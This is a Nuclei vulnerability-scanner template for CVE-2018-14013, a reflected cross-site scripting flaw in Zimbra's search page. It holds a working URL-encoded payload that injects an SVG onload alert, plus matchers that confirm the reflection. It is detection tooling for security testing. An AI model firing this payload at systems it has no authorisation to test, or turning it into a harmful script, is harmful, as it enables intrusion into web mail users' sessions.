nuclei-templates/cves/2018/CVE-2018-14013.yaml

30 lines
636 B
YAML
Raw Normal View History

2021-07-27 07:34:36 +00:00
id: CVE-2018-14013
info:
name: Zimbra XSS.
author: pikpikcu
severity: medium
reference: https://nvd.nist.gov/vuln/detail/CVE-2018-14013
tags: cve,cve2018,xss,zimbra
requests:
- method: GET
path:
- "{{BaseURL}}/zimbra/h/search?si=1&so=0&sfi=4&st=message&csi=1&action=&cso=0&id=%22%22%3E%3Csvg%20onload%3Dalert%28document.domain%29%3E"
matchers-condition: and
matchers:
- type: word
words:
- '<svg onload=alert(document.domain)>'
part: body
- type: status
status:
- 200
- type: word
part: header
words:
- text/html